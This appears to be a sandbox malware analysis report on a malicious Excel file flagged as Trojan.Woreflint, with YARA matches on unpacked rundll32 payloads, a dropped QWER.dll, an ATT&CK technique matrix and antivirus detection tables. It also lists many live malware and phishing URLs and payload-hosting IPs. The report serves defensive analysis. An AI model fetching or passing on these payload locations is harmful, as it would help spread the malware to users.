Source: Yara match	File source: 15.2.rundll32.exe.3a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2dd0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.24f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.30b0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.ac0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.b20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.bd0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d00000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.b10000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\QWER.dll, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Scripting	1 Windows Service	1 Windows Service	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Email Collection	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	13 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	11 Scripting	Security Account Manager	38 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	111 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	21 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	122 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Service Execution	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 PowerShell	Rc.common	Rc.common	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
364453688149503140239183.xls	19%	ReversingLabs	Document-Excel.Trojan.Woreflint

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\QWER.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.2.rundll32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2520000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.4b0000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
16.2.rundll32.exe.270000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.3020000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2a0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.2850000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.380000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.2e90000.16.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2820000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.2860000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.a30000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.bd0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.b80000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.a30000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.2a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2f60000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.24f0000.9.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.2c90000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2e40000.12.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.25e0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.440000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.30b0000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.bd0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.2dd0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.ac0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.2d00000.14.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2e80000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.b20000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.a00000.5.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.rundll32.exe.340000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.26a0000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.b50000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.5a0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.2e60000.15.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.cc0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.2fe0000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.26d0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.210000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2e00000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.4e0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.840000.3.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.2c60000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.8f0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.170000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.rundll32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
14.2.rundll32.exe.b00000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2e70000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.1e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.ae0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2910000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.350000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.3a0000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.bc0000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.27e0000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2590000.11.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.2ec0000.17.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.310000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.b50000.7.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.2890000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.b10000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.470000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2f40000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File

Domains

Source	Detection	Scanner	Label	Link
ayoobeducationaltrust.in	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://91.240.118.168/vvv/ppp/fe.htmlWinSta0	100%	Avira URL Cloud	malware
http://91.240.118.168/vvv/ppp/fe	100%	Avira URL Cloud	malware
http://cmit.valestudios.com/wp-admin/RueGJ41A/	13%	Virustotal		Browse
http://cmit.valestudios.com/wp-admin/RueGJ41A/	100%	Avira URL Cloud	malware
http://sellin.ap	0%	Avira URL Cloud	safe
http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/	100%	Avira URL Cloud	phishing
http://91.240.118.168/vvv/ppp/fe.htmlv1.0	100%	Avira URL Cloud	malware
http://test.drea	0%	Avira URL Cloud	safe
http://bawelnianka.cfolks.pl/wp-content/Ttv/	100%	Avira URL Cloud	phishing
http://91.240.11	0%	URL Reputation	safe
http://ayoobeducationaltrust.in	100%	Avira URL Cloud	phishing
https://160.16.102.168:80/gYIhzpB	0%	Avira URL Cloud	safe
http://huculek.f	0%	Avira URL Cloud	safe
https://160.16.102.168:80/gYIhzpA	0%	Avira URL Cloud	safe
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/	100%	Avira URL Cloud	malware
http://91.240.118.168/vvv/ppp/fe.pngPE3	100%	Avira URL Cloud	malware
http://cmit.valestudios.com/wp-a	100%	Avira URL Cloud	malware
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3	100%	Avira URL Cloud	malware
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3	100%	Avira URL Cloud	malware
http://91.240.118.168/vvv/ppp/fe.htmlmshta	100%	Avira URL Cloud	malware
http://test.valestudios.com/wp-c	100%	Avira URL Cloud	malware
http://www.protware.com/	0%	URL Reputation	safe
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3	100%	Avira URL Cloud	phishing
http://thesocialagent.net/b/MO5AKqJ9Ty9lE/	100%	Avira URL Cloud	malware
http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3	100%	Avira URL Cloud	malware
https://160.16.102.168:80/gYIhzp	0%	Avira URL Cloud	safe
http://91.240.118.168/vvv/ppp/fe.png	100%	Avira URL Cloud	malware
http://91.2	0%	Avira URL Cloud	safe
http://test.dreamcityorlando.com	100%	Avira URL Cloud	malware
http://crm.compracasaenhouston.c	0%	Avira URL Cloud	safe
http://91.240.118.168/vvv/ppp/fe.htmlC:	100%	Avira URL Cloud	malware
http://curvygirlsboutique.com/jf	100%	Avira URL Cloud	malware
http://91.240.118.168/vvv/ppp/fe.html3	100%	Avira URL Cloud	malware
http://test.vale	0%	Avira URL Cloud	safe
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3	100%	Avira URL Cloud	malware
http://crm.compr	0%	Avira URL Cloud	safe
http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3	100%	Avira URL Cloud	phishing
http://lynsmithgroup.com/hftm2i2	0%	Avira URL Cloud	safe
http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/	100%	Avira URL Cloud	malware
http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html	100%	Avira URL Cloud	malware
http://crm.compracasaenhouston.com/hs4d8a/c0s13I/	100%	Avira URL Cloud	phishing
http://www.protware.com	0%	URL Reputation	safe
http://91.240.118.168	100%	URL Reputation	malware

